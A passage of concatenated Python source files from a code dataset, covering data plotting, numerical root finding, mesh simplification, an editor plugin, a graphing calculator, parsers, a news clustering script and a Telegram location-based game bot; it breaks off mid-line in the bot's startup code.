'''\n\n'''Data downloaded from National Center for Environmental Information (NCEI)'''\n\n\n\nimport numpy as np \nimport matplotlib.pyplot as plt\n\n##Read the csv file\ndata = 'NCEIdata.csv'\n\n\"\"\"Making a 2d numpy array from data where only the wind and pressure columns are taken\nAlso masked and hide columns with no values\"\"\"\ndata1 = np.genfromtxt(data, delimiter=',', dtype = float, skip_header=1, usecols=(17,20))\ndata1 = np.ma.masked_where(np.isnan(data1), data1)\ndata1 = np.ma.compress_rows(data1)\n\n\n#Defining wind and pressure array through indexing\nwind = (data1[:,0])\npressure = (data1[:,1])\n\n#Finding the 70% of highest wind threshold\nhighwind = (np.amax(wind))*0.7\n\n#Making a array where winds below threshold are masked\nstrongwind = np.ma.masked_where(wind < highwind, wind)\n\n\n#Making the plot \nplt.scatter(wind,pressure, label = \"Wind vs. Pressure\", s = 4)\nplt.scatter(strongwind,pressure, c = 'r', s = 4, label = \"Strongest Wind vs. Pressure\")\nplt.title(\"Wind Speed vs. Pressure\")\nplt.xlabel(\"Wind Speed (mph)\")\nplt.ylabel(\"Pressure (in)\")\nplt.legend(loc='best')\nplt.show()\n\n\n\n\n","sub_path":"NCEI_Conditions.py","file_name":"NCEI_Conditions.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"50080683","text":"class RootFindingClass:\n def __init__(self, minv, maxv, N, method, f, fp, tol):\n import numpy as np\n self.minv = float(minv)\n self.maxv = float(maxv)\n self.N = N\n self.method = method\n self.f = f\n self.fp = fp\n self.tol = tol\n\n def Solve(self):\n\n if self.method is 'Bisection':\n from Bisection import Bisection\n self.x_n = Bisection([self.minv, self.maxv], self.N, self.f)\n elif self.method is 'RegulaFalsi':\n from RegulaFalsi import RegulaFalsi\n self.x_n = RegulaFalsi([self.minv, self.maxv], self.N, self.f)\n elif self.method is 'Secant':\n from Secant import Secant\n self.x_n = Secant([self.minv, self.maxv], self.N, self.f)\n elif self.method is 'NewtonRaphson':\n from NewtonRaphson import NewtonRaphson\n self.x_n = NewtonRaphson([self.minv, self.maxv], self.N, self.f, self.fp)\n elif self.method is 'Brent':\n from Brent import Brent\n self.x_n = Brent([self.minv, self.maxv], self.N, self.f, self.tol)\n\n#def f (x): return x**3 - 27\n#def fp(x): return 3*x**2\n#\n#Eqn = RootFindingClass(1, 10, 10, 'Brent', f, fp, 1e-4)\n#Eqn.Solve()\n#\n#print Eqn.x_n\n","sub_path":"Root finding/RootFinding_class.py","file_name":"RootFinding_class.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"524228501","text":"import numpy as np\nimport open3d as o3d\n\n\ndef simplification(verts, faces, target_number_of_triangles, maximum_error=None, boundary_weight=1.0):\n tri_mesh = o3d.geometry.TriangleMesh()\n tri_mesh.vertices = o3d.utility.Vector3dVector(verts)\n tri_mesh.triangles = o3d.utility.Vector3iVector(faces)\n simplified_mesh = tri_mesh.simplify_quadric_decimation(\n target_number_of_triangles)\n return np.array(simplified_mesh.vertices), np.array(simplified_mesh.triangles)\n","sub_path":"mesh_process/simplification.py","file_name":"simplification.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"364817264","text":"import sublime, sublime_plugin\n\n\nclass MultiSelectCommand(sublime_plugin.TextCommand):\n '''\n Установка курсора в начало каждой из выделенных строк\n '''\n def run(self, edit):\n v = self.view\n\n # Получаем выделенные регионы\n selected_regions = list(v.sel())\n\n # Убираем выделения текста\n v.sel().clear()\n\n '''\n Проходимся по всем выделеным регионам\n и получаем границы выделенных строк\n '''\n for sel_region in selected_regions:\n selected_lines = v.lines(sel_region)\n\n # Проходимся по всем выделенным строкам\n for (start, end) in selected_lines:\n # Устанавливаем курсор в начало строки\n v.sel().add(sublime.Region(start))\n\n sublime.status_message(\"success\")\n","sub_path":"multiselect.py","file_name":"multiselect.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"382549020","text":"# Andy Kotz final project: graphing calculator with regressions\n\nfrom ggame import App, Color, LineStyle, Sprite, RectangleAsset, TextAsset\nfrom ggame import CircleAsset, ImageAsset\nfrom math import sin, cos, radians\n\nSCREEN_WIDTH = 1900\nSCREEN_HEIGHT = 1000\n\ndef correlation(xlistpts,ylistpts):\n N = len(xlistpts)\n corgofor = 0\n Exylist = []\n while corgofor <= len(xlistpts)-1:\n jum = xlistpts[corgofor]*ylistpts[corgofor]\n Exylist.append(jum)\n corgofor += 1\n Exy = sum(Exylist)\n Ex = sum(xlistpts)\n Ey = sum(ylistpts)\n Ex2list = []\n Ey2list = []\n for j in xlistpts:\n jummy = j**2\n Ex2list.append(jummy)\n for i in ylistpts:\n jumby = i**2\n Ey2list.append(jumby)\n Ex2 = sum(Ex2list)\n Ey2 = sum(Ey2list)\n numerator = (N*Exy)-(Ex*Ey)\n denominator = (((N*Ex2)-(Ex)**2)*((N*Ey2)-(Ey)**2))**0.5\n r = numerator/denominator\n return (r)\ndef quadreg(xlistpts,ylistpts):\n N = len(xlistpts)\n Ex = sum(xlistpts)\n Ey = sum(ylistpts)\n Ex2list = []\n Ex3list = []\n Ex4list = []\n for j in xlistpts:\n jummy = j**2\n Ex2list.append(jummy)\n Ex2 = sum(Ex2list)\n for j in xlistpts:\n jummy = j**3\n Ex2list.append(jummy)\n Ex3 = sum(Ex3list)\n for j in xlistpts:\n jummy = j**4\n Ex2list.append(jummy)\n Ex4 = sum(Ex4list)\n corgofor = 0\n Exylist = []\n while corgofor <= len(xlistpts)-1:\n jum = xlistpts[corgofor]*ylistpts[corgofor]\n Exylist.append(jum)\n corgofor += 1\n Exy = sum(Exylist)\n Ex2y = Ex2+Ey\n Exx = (Ex2)-(((Ex)**2)/N)\n Exy = (Exy) - ((Ex*Ey)/N)\n Exx2 = (Ex3) - ((Ex2*Ex)/N)\n Ex2y = (Ex2y) - ((Ex2*Ey)/N)\n Ex2x2 = (Ex4) - (((Ex2)**2)/N)\n a = ((Ex2y*Exx)-(Exy*Exx2))/((Exx*Ex2x2)-(Exx2)**2)\n b = ((Exy*Ex2x2)-(Ex2y*Exx2))/((Exx*Ex2x2)-(Exx2)**2)\n c = (Ey/N)-(b*(Ex/N))-(a*(Ex2/N))\n returnlist = [a,b,c]\n return(returnlist)\n\ncoords = None\nesetreg = TextAsset(\"Congratulations! you win 1 million dollars!\", style = '40pt Arial')\nred = Color(0xff0000, 1.0)\ngreen = Color(0x00ff00, 1.0)\nblue = Color(0x0000ff, 1.0)\nblack = Color(0x000000, 1.0)\npurple = Color(0x9B30FF, 1.0)\ngrey = Color(0xd3d3d3, 0.7)\nthinline = LineStyle(0, black)\nyaxis = RectangleAsset(1, 1000, thinline, black)\nxaxis = RectangleAsset(1900, 1, thinline, black)\nycursor = RectangleAsset(1, 1000, thinline, grey)\nxcursor = RectangleAsset(1900, 1, thinline, grey)\nclass Xcursorclass(Sprite):\n def __init__(self, position):\n super().__init__(xcursor, position)\nclass Ycursorclass(Sprite):\n def __init__(self, position):\n super().__init__(ycursor, position)\nxcurse = Xcursorclass((0,0))\nycurse = Ycursorclass((0,0))\nxaxisrulings = RectangleAsset(1, 7, thinline, black)\nyaxisrulings = RectangleAsset(7, 1, thinline, black)\nthinline = LineStyle(0, black)\ncircle = CircleAsset(3, thinline, blue)\ncirclebig = CircleAsset(6, thinline, red)\nSprite (xaxis, (0, 500))\nSprite (yaxis, (950, 0))\nsmiley = ImageAsset(\"smileyface.jpg\")\nyaxisrulingsprites = [Sprite(yaxisrulings, (947.5, y*20)) for y in range(-100, 100, 1)]\nxaxisrulingsprites = [Sprite(xaxisrulings, (x*20+10, 497)) for x in range(-150, 150, 1)]\n\nxcoordinates2 = range(-1500, 1500, 1)\nxcoordinates = []\nfor x in xcoordinates2:\n x = x/32\n xcoordinates.append(x)\n\npointpos = 1\nlinetypelist = input(\"choose function, plot (f,p). Separate by commas: \")\nlinetypelist = linetypelist.split(\",\")\nfor linetype in linetypelist:\n if linetype == \"f\":\n function = input(\"y=\")\n for x in xcoordinates:\n yval = (-20*(eval(function))+500)\n if yval >= 0 and yval <= 1000:\n Sprite (circle, ((20*x+950), yval))\n if linetype == \"p\":\n again = True\n ylistpts=[]\n xlistpts=[]\n while again == True:\n point = input(\"input point x,y. press q to quit, qr or lr to regress: \")\n if point == \"q\" or point == \"qr\" or point == \"lr\":\n again = False\n if again == True:\n point = point.split(\",\")\n xlistpts.append(float(point[0]))\n ylistpts.append(float(point[1]))\n if point == \"lr\":\n xlistmean = (sum(xlistpts))/len(xlistpts)\n ylistmean = (sum(ylistpts))/len(ylistpts)\n xmeanlist = []\n ymeanlist = []\n for i in xlistpts:\n x = i-xlistmean\n x = x**2\n xmeanlist.append(x)\n for i in ylistpts:\n y = i-ylistmean\n y = y**2\n ymeanlist.append(y)\n sdx = (sum(xmeanlist)/len(xmeanlist))**0.5\n sdy = (sum(ymeanlist)/len(ymeanlist))**0.5\n rval = correlation(xlistpts, ylistpts)\n regreslope = rval*(sdy/sdx)\n regreintercept = ylistmean - (regreslope*xlistmean)\n regreinterceptprint = str(round(10*regreintercept)/10)\n oper = \"+\"+regreinterceptprint\n if regreintercept < 0:\n oper = \"-\"+regreinterceptprint\n if regreintercept == 0:\n oper = \"\"\n print (\"Regression: y=\"+str((round(10*regreslope))/10)+\"x\"+ oper +\". r = \" + str(round(10000*rval)/10000))\n for x in xcoordinates:\n yval = (-20*(regreslope*x+regreintercept)+500)\n if yval >= 0 and yval <= 1000:\n Sprite (circle, ((20*x+950), yval))\n if point == \"qr\":\n abc = quadreg(xlistpts,ylistpts)\n quada = abc[0]\n quadb = abc[1]\n quadc = abc[2]\n for x in xcoordinates:\n yval = (-20*(quada*(x**2)+quadb*x+quadc)+500)\n if yval >= 0 and yval <= 1000:\n Sprite (circle, ((20*x+950), yval))\n goforh = 0\n while goforh <= len(xlistpts)-1:\n Sprite(circlebig, (20*float(xlistpts[goforh])+950, -20*float(ylistpts[goforh])+500))\n goforh += 1\n goforlist = 1\n while goforlist <= len(xlistpts)-1:\n pointz = TextAsset(\"(\"+str(xlistpts[goforlist-1])+\",\"+str(ylistpts[goforlist-1])+\"), (\"+str(xlistpts[goforlist])+\",\"+str(ylistpts[goforlist])+\")\", style = '8pt Arial')\n goforlist+=2\n Sprite (pointz, (10, pointpos*15))\n pointpos+=1\n if linetype in ['a', 'b', 'c', 'd', 'e', 's', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'q', 'r', 't', 'u', 'v', 'w', 'x', 'y', 'z']:\n Sprite (esetreg, (200, 200))\ndef mousePosition(event):\n global text\n global coords\n if coords != None:\n coords.destroy()\n xcurse.y = event.y-7\n ycurse.x = event.x-9\n text = TextAsset(\"(\" + str(round((event.x-959)/20)) + \",\" + str(round((-(event.y-507))/20)) + \")\", style = '10pt Arial')\n coords = Sprite(text, (event.x-7, event.y-22))\ndef mouseclick(event):\n Sprite (smiley, (100, 100))\n \n\nmyapp = App(SCREEN_WIDTH, SCREEN_HEIGHT)\nmyapp.run()\nmyapp.listenMouseEvent('mousemove', mousePosition)\nmyapp.listenMouseEvent('mouseclick', mouseclick)\n","sub_path":"Graphingcalc.py","file_name":"Graphingcalc.py","file_ext":"py","file_size_in_byte":7239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"52991472","text":"#!/usr/bin/env python\n\nimport qm\nimport pylab\nfrom pylab import arange,pi,sin,cos,sqrt\nimport random\n\n# set up the plotting code to use latex\nparams = { 'text.usetex': True }\npylab.rcParams.update(params)\n\n# data parameters\npi = qm.QM_PI\nN = 262144\nsf = 4096.0\ndt = 1.0 / sf\nf_min = 40.0\nconv = 0\n\n# noise generation seed\nseed = 78\n\n# generate an Initial LIGO power spectrum\npsd = qm.new_ligo_psd(N,dt)\n\n# template 1 parameters\nm1_1 = random.uniform(6,14)\nsup_1 = min(3,15-m1_1)\nm2_1 = random.uniform(1,sup_1)\nchi_1 = random.uniform(0.01,0.99)\nkappa_1 = random.uniform(-0.99,0.99)\n\n# template 2 parameters\nm1_2 = random.uniform(6,14)\nsup_2 = min(3,15-m1_1)\nm2_2 = random.uniform(1,sup_1)\nchi_2 = random.uniform(0.01,0.99)\nkappa_2 = random.uniform(-0.99,0.99)\n\ndistance = qm.calculate_ptf_kludge_distance( m1_1, m2_1, chi_1, kappa_1, m1_2, m2_2,\nchi_2, kappa_2, psd, f_min )\n\nprint(\"template #1 parameters: (m1_1, m2_1, chi_1, kappa_1) = (%f %f %f %f)\\n\" % (m1_1,\nm2_1, chi_1, kappa_1))\nprint(\"template #2 parameters: (m1_2, m2_2, chi_2, kappa_2) = (%f %f %f %f)\\n\" % (m1_2,\nm2_2, chi_2, kappa_2))\nprint (\"distance = %f\\n\" % distance)\n","sub_path":"test/ptf_kludge_distance_test.py","file_name":"ptf_kludge_distance_test.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"495917801","text":"# general imports\nimport re\n\n# tokenizer imports\nfrom S_parser.Tokenizer.Stup_Option import Option\nfrom S_parser.Tokenizer.Stup_Selector import Selector\nfrom S_parser.Tokenizer.Token import Token\n# imports for the ast\nfrom S_parser.Tree.Stup_Token_Selector import TokenSelector\n\n# DEBUG FLAGS\nDebugShowTokens = True\n\n# MainOptions with patterns to match\nMainOptions = []\nMainOptions.append(Option(\"Tag\", r\"\\<([a-zA-Z0-9_]+)\\>\", 1))\nMainOptions.append(Option(\"String\", r'\"(?:[^\"\\\\]|\\\\.)*\"'))\nMainOptions.append(Option(\"Regex\", r\"R/(.+?)\\/R\", 1))\nMainOptions.append(Option(\"Colon\", r\"\\:\"))\nMainOptions.append(Option(\"SemiColon\", r\"\\;\"))\nMainOptions.append(Option(\"LBrace\", r\"\\[\"))\nMainOptions.append(Option(\"RBrace\", r\"\\]\"))\nMainOptions.append(Option(\"Comma\", r\"\\,\"))\nMainOptions.append(Option(\"plus\", r\"\\+\"))\nMainOptions.append(Option(\"star\", r\"\\*\"))\n\n# the whitespaces for debugging (whitespace after newline)\nMainOptions.append(Option(\"NewLine\", r\"\\n\"))\nMainOptions.append(Option(\"Whitespace\", r\"\\s+\"))\n\nclass Parser:\n # give the grammar to the parser.\n # the default entrypoint\n def __init__(self, grammar, entry_point=\"start\"):\n # put the grammar for the parser into a variable\n self.grammar = grammar\n self.grammar_text = grammar\n # keep track of where I am inside the grammar\n self.line = 1\n self.index = 0\n print(\"creating the parser!\")\n self.MainSelector = Selector(MainOptions)\n # start building the grammar for my parser\n toks = self.Grammar_to_tokens()\n print(\"build the parser! from text:\")\n print(self.grammar_text)\n self.Meta_Selector = TokenSelector(toks, entry_point)\n\n # get the tokens from the grammar file\n def Grammar_to_tokens(self):\n # get all the tokens from the grammar file\n tokens = []\n for tok in self.get_Tokens():\n if tok[1].name == \"NewLine\":\n self.line += 1\n self.index = 0\n else:\n # update the location after setting the token\n if tok[1].name != \"Whitespace\":\n tok[1].setLocation(self.line, self.index)\n tokens.append(tok)\n # add the length of the token to the index\n self.index += len(tok[0])\n\n # tok[0] is the full matched string.\n # tok[1] is the token that get's made\n self.grammar = self.grammar[len(tok[0]):]\n\n # now that we have the tokens we only keep the token object\n tokens = [tok[1] for tok in tokens]\n if DebugShowTokens:\n # show the tokens\n for tok in tokens:\n print(tok)\n return tokens\n\n # private function that returns the tokens\n def get_Tokens(self):\n canParse = True\n # start parsing the grammar file\n while len(self.grammar) > 0 and canParse:\n canParse = False\n choiceIndex = self.MainSelector.select(self.grammar)\n # verify the index\n if self.MainSelector.verifyIndex(choiceIndex):\n canParse = True\n # get the matched text from the chosen option\n matched_text = self.MainSelector.options[choiceIndex].match(self.grammar)\n yield [matched_text.group(0), Token(self.MainSelector.options[choiceIndex].name, matched_text.group(self.MainSelector.options[choiceIndex].group))]\n else:\n # we will have to break out of this loop and see what text does not parse.\n canParse = False\n if len(self.grammar) > 0:\n # could not parse a piece of text\n print(\"length of text is:'{}'\".format(len(self.grammar)))\n raise SyntaxError(\"The grammar file could not be read correctly. error on:'{}'\".format(self.grammar))\n else:\n print(\"grammar tokenized succesfully\")","sub_path":"src/S_parser/Stupid_parser.py","file_name":"Stupid_parser.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"243958089","text":"import tulip.value as v\nfrom tulip.symbol import sym\nfrom tulip.lexer import Token\n\ndef parse_skeleton(lexer):\n lexer.setup()\n parsed = _parse_sequence(lexer, None, 0)\n lexer.teardown()\n return parsed\n\nclass ParseError(StandardError):\n def __init__(self, token, message):\n self.token = token\n self.message = message\n\nclass UnexpectedError(ParseError):\n def dump(self):\n return u'unexpected token %s: %s' % (self.token.dump(), self.message)\n\nclass UnmatchedError(ParseError):\n def dump(self):\n return u'unmatched delimiter %s: expected %s' % (self.token.dump(), self.message)\n\ndef unexpected(tok, message):\n raise UnexpectedError(tok, message)\n\ndef unmatched(tok, message):\n raise UnmatchedError(tok, message)\n\ndef _parse_sequence(lexer, open_tok, expected_close_id):\n elements = []\n\n while True:\n tok = lexer.next()\n\n if tok.tokid == Token.EOF:\n if open_tok is None:\n return v.cons_list(elements)\n else:\n unmatched(open_tok, Token.TOKENS[expected_close_id])\n elif open_tok is not None and tok.tokid == expected_close_id:\n return v.tag(u'nested', [v.Token(open_tok), v.Token(tok), v.cons_list(elements)])\n elif tok.tokid in [ Token.RPAREN, Token.RBRACK, Token.RBRACE ]:\n if open_tok is not None:\n unexpected(tok, u'invalid nesting from %s' % open_tok.dump())\n else:\n unexpected(tok, u'invalid nesting from the beginning')\n elif tok.tokid == Token.LPAREN:\n elements.append(_parse_sequence(lexer, tok, Token.RPAREN))\n elif tok.tokid == Token.LBRACK or tok.tokid == Token.MACRO:\n elements.append(_parse_sequence(lexer, tok, Token.RBRACK))\n elif tok.tokid == Token.LBRACE:\n elements.append(_parse_sequence(lexer, tok, Token.RBRACE))\n elif tok.tokid == Token.NL and expected_close_id == Token.RPAREN:\n pass\n elif tok.tokid == Token.NL and lexer.peek().eats_preceding_newline():\n pass\n else:\n elements.append(v.tag(u'token', [v.Token(tok)]))\n\ndef parse_from_string(s):\n from tulip.reader import StringReader\n from tulip.lexer import ReaderLexer\n reader = StringReader(u'(parse_from_string)', s)\n lexer = ReaderLexer(reader)\n return parse_skeleton(lexer)\n","sub_path":"tulip/skeleton.py","file_name":"skeleton.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"148932074","text":"from newsie.models import ArticleCluster\nfrom datetime import datetime, timedelta\nfrom django.utils import timezone\nfrom newsie.publications.get_articles import categories\n\ndef find_top_stories():\n for category in categories(): #Iterate through RSS feed Categories\n\n #Get today's stories\n today = timezone.make_aware(datetime.today())\n last_36_hours = timezone.make_aware(datetime.today() - timedelta(hours=36))\n\n # Find top 5 clusters if size is 2 or greater\n top_stories = ArticleCluster.objects \\\n .filter(most_recent_pub_date__gte=last_36_hours, category__exact=category, size_today__gte=2) \\\n .order_by('-size_today')[:15]\n\n for cluster in top_stories:\n cluster.top_story_on = today\n cluster.save()","sub_path":"newsie/scripts/find_top_stories.py","file_name":"find_top_stories.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"286130918","text":"import logging\r\nimport sqlite3\r\n\r\nimport math\r\nfrom telegram import Message, Chat, ReplyKeyboardMarkup, KeyboardButton, Location\r\nfrom telegram.ext import Updater, CommandHandler, MessageHandler\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n\r\nDISCOVER_RADIUS = 0.1\r\n\r\ndef start(bot, update):\r\n db_connection = sqlite3.connect('JacobsHack.db')\r\n db = db_connection.cursor()\r\n db.execute(\"CREATE TABLE IF NOT EXISTS users (name text, points integer, objdesc text)\")\r\n\r\n message = \"Something went wrong :(\"\r\n\r\n select_data = (str(update.message.from_user.username),)\r\n db.execute(\"SELECT * FROM users WHERE name=?\", select_data)\r\n user = db.fetchone()\r\n if user:\r\n message = ' '.join(['Welcome back ' + user[0] + '! You have*',\r\n str(user[1]), 'points*.\\nType /help if you need anything.'])\r\n else:\r\n insert_data = (str(update.message.from_user.username), 10, \"\")\r\n db.execute(\"INSERT INTO users (name, points, objdesc) VALUES (?,?,?)\", insert_data)\r\n message = 'Hello ' + insert_data[0] + '!\\nType /help if you need anything!'\r\n\r\n bot.sendMessage(update.message.chat.id, message, parse_mode=\"Markdown\")\r\n db_connection.commit()\r\n\r\n\r\ndef send_help(bot, update):\r\n message = ''.join(['*JHGeoGameBot* hosts a location-based game in which you will try to capture objectives.\\n',\r\n 'To begin playing, type /start and send a location. We will automatically parse it for you and ',\r\n 'give you the distance to the closest objective. Once you\\'re close enough, you will capture ',\r\n 'it and receive *25 points* for your effort.\\n\\n',\r\n 'When you reach *100 points* you will be able to set up your own objective as long as it is ',\r\n 'far enough from any other existing objective. When other users capture your objective, ',\r\n 'you will receive *5 points*.\\n'\r\n ])\r\n bot.sendMessage(update.message.chat.id, message, parse_mode=\"Markdown\")\r\n\r\n\r\ndef get_points(bot, update):\r\n db_connection = sqlite3.connect('JacobsHack.db')\r\n db = db_connection.cursor()\r\n db.execute(\"CREATE TABLE IF NOT EXISTS users (name text, points integer, objdesc text)\")\r\n db.execute(\"CREATE TABLE IF NOT EXISTS locations (lon real, lat real, owner text, objdesc text, id integer) \")\r\n db.execute(\"SELECT points FROM users WHERE name=?\", (str(update.message.from_user.username),))\r\n points = db.fetchone()\r\n message = \"\"\r\n db.execute(\"SELECT * FROM locations\")\r\n print(db.fetchall())\r\n if points is not None:\r\n message = ''.join(['You have *' + str(points[0]) + ' points*.\\n',\r\n 'You can use *100 points* to set up your own objective with /addobj'\r\n ])\r\n else:\r\n message = 'It seems you haven\\'t started playing. Type /start and join the game!'\r\n\r\n bot.sendMessage(update.message.chat.id,\r\n message,\r\n reply_to_message_id=update.message.message_id,\r\n parse_mode=\"Markdown\")\r\n\r\n\r\ndef add_objective(bot, update, args):\r\n if len(args) > 0:\r\n db_connection = sqlite3.connect('JacobsHack.db')\r\n db = db_connection.cursor()\r\n db.execute(\"CREATE TABLE IF NOT EXISTS users (name text, points integer, objdesc text)\")\r\n db.execute(\"CREATE TABLE IF NOT EXISTS locations (lon real, lat real, owner text, objdesc text, locid integer) \")\r\n db.execute(\"SELECT * FROM users WHERE name=?\", (str(update.message.from_user.username),))\r\n user = db.fetchone()\r\n if user:\r\n if user[2]:\r\n bot.sendMessage(update.message.chat.id,\r\n 'You are already adding a new objective. Type /cancel to get your points back.',\r\n reply_to_message_id=update.message.message_id)\r\n elif user[1] >= 100:\r\n db.execute(\"UPDATE users SET points=?, objdesc=? WHERE name=?\", (user[1]-100, ' '.join(args), user[0]))\r\n message = ''.join(['I have now subtracted *100 points* from your score. ',\r\n 'The next location you send will be registered as an objective. ',\r\n 'Type /cancel to get your points back.'])\r\n bot.sendMessage(update.message.chat.id,\r\n message,\r\n parse_mode=\"Markdown\",\r\n reply_to_message_id=update.message.message_id)\r\n else:\r\n message = ''.join(['You don\\'t have enough points to set up a new objective.',\r\n ' Try again when you have *100 points*.'])\r\n bot.sendMessage(update.message.chat.id,\r\n message,\r\n reply_to_message_id=update.message.message_id,\r\n parse_mode=\"Markdown\")\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'It seems you haven\\'t started playing. Type /start and join the game!',\r\n reply_to_message_id=update.message.message_id)\r\n db_connection.commit()\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'Usage: /addobj ',\r\n reply_to_message_id=update.message.message_id)\r\n\r\n\r\ndef cancel_objective(bot, update):\r\n db_connection = sqlite3.connect('JacobsHack.db')\r\n db = db_connection.cursor()\r\n db.execute(\"CREATE TABLE IF NOT EXISTS users (name text, points integer, objdesc text)\")\r\n db.execute(\"SELECT * FROM users WHERE name=?\", (str(update.message.from_user.username),))\r\n user = db.fetchone()\r\n if user:\r\n if len(user[2]):\r\n db.execute(\"UPDATE users SET points=?, objdesc=? WHERE name=?\", (user[1]+100, \"\", user[0]))\r\n bot.sendMessage(update.message.chat.id,\r\n 'Canceled successfully. You now have *' + str(user[1]+100) + '* points.',\r\n reply_to_message_id=update.message.message_id,\r\n parse_mode=\"Markdown\")\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'Nothing to cancel.',\r\n reply_to_message_id=update.message.message_id)\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'It seems you haven\\'t started playing. Type /start and join the game!',\r\n reply_to_message_id=update.message.message_id)\r\n db_connection.commit()\r\n\r\n\r\ndef cheat(bot, update):\r\n db_connection = sqlite3.connect('JacobsHack.db')\r\n db = db_connection.cursor()\r\n db.execute(\"CREATE TABLE IF NOT EXISTS users (name text, points integer, objdesc text)\")\r\n db.execute(\"SELECT * FROM users WHERE name=?\", (str(update.message.from_user.username),))\r\n user = db.fetchone()\r\n if user:\r\n db.execute(\"UPDATE users SET points=? WHERE name=?\", (user[1]+100, user[0]))\r\n bot.sendMessage(update.message.chat.id,\r\n 'You HACKED yourself some points.')\r\n db_connection.commit()\r\n\r\n\r\ndef distFromCoords(lon1, lat1, lon2, lat2):\r\n radius = 6371\r\n dlon = abs(lon1-lon2)*math.pi/180\r\n dlat = abs(lat1-lat2)*math.pi/180\r\n a = math.sin(dlat/2)*math.sin(dlat/2)+math.cos(lat1*math.pi/180)*math.cos(lat2*math.pi/180)*math.sin(dlon/2)*math.sin(dlon/2)\r\n b = 2*math.atan2(math.sqrt(a), math.sqrt(1-a))\r\n dist = radius*b\r\n return dist\r\n\r\n\r\ndef message_handler(bot, update):\r\n if update.message.text:\r\n keyboard_button = KeyboardButton(text='Send location', request_location=True)\r\n bot.sendMessage(update.message.chat.id,\r\n 'Less talking and more searching!\\nSend me your location to search around!',\r\n reply_to_message_id=update.message.message_id,\r\n reply_markup=ReplyKeyboardMarkup([[keyboard_button]]))\r\n elif update.message.location:\r\n lon = update.message.location['longitude']\r\n lat = update.message.location['latitude']\r\n db_connection = sqlite3.connect('JacobsHack.db')\r\n db = db_connection.cursor()\r\n db.execute(\"CREATE TABLE IF NOT EXISTS users (name text, points integer, objdesc text)\")\r\n db.execute(\"CREATE TABLE IF NOT EXISTS locations (lon real, lat real, owner text, objdesc text, locid integer) \")\r\n db.execute(\"CREATE TABLE IF NOT EXISTS matches (user text, matchid integer)\")\r\n\r\n db.execute(\"SELECT * FROM users WHERE name=?\", (str(update.message.from_user.username),))\r\n user = db.fetchone()\r\n if user:\r\n min_dist = 10000\r\n usr = ''\r\n desc = ''\r\n objid = 0\r\n for obj in db.execute(\"SELECT * FROM locations WHERE owner!=? AND locid NOT IN (SELECT matchid FROM matches WHERE user=?)\", (user[0],user[0])):\r\n if obj is not None:\r\n dist = distFromCoords(obj[0], obj[1], lon, lat)\r\n if dist < min_dist:\r\n min_dist = dist\r\n usr = obj[2]\r\n desc = obj[3]\r\n objid = obj[4]\r\n if user[2]:\r\n if min_dist > DISCOVER_RADIUS:\r\n db.execute(\"SELECT COUNT(*) FROM locations\")\r\n size = db.fetchone()[0]\r\n db.execute(\"INSERT INTO locations (lon, lat, owner, objdesc, locid) VALUES (?,?,?,?,?)\",\r\n (lon, lat, update.message.from_user.username, user[2], size))\r\n db.execute(\"UPDATE users SET objdesc='' WHERE name=?\", (user[0],))\r\n bot.sendMessage(update.message.chat.id,\r\n '*New objective successfully registered!*',\r\n reply_to_message_id=update.message.message_id,\r\n parse_mode=\"Markdown\")\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'You\\'re too close to an already existing objective!',\r\n reply_to_message_id=update.message.message_id)\r\n else:\r\n message = 'Something went wrong :('\r\n if 10000 > min_dist >= DISCOVER_RADIUS:\r\n d = (\"%.2f\" % min_dist)\r\n message = 'The closest objective is *' + str(d) + '* km away.'\r\n elif min_dist < DISCOVER_RADIUS:\r\n message = 'Captured the objective \\\"' + desc + '\\\" by @' + usr + '!\\n*+25 POINTS!*'\r\n db.execute(\"UPDATE users SET points = ? WHERE name = ?\", (user[1]+25, user[0]))\r\n db.execute(\"UPDATE users SET points = points+5 WHERE name = ?\", (usr,))\r\n db.execute(\"INSERT INTO matches (user, matchid) VALUES (?,?)\",\r\n (user[0], objid))\r\n else:\r\n message = 'No nearby objectives were found. Your own objectives won\\'t show up'\r\n\r\n bot.sendMessage(update.message.chat.id,\r\n message,\r\n parse_mode=\"Markdown\",\r\n reply_to_message_id=update.message.message_id)\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'It seems you haven\\'t started playing. Type /start and join the game!',\r\n reply_to_message_id=update.message.message_id)\r\n db_connection.commit()\r\n\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'That\\'s cool! We don\\'t have any use for it though...',\r\n reply_to_message_id=update.message.message_id)\r\n\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n\r\nif __name__ == '__main__':\r\n logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\r\n updater = 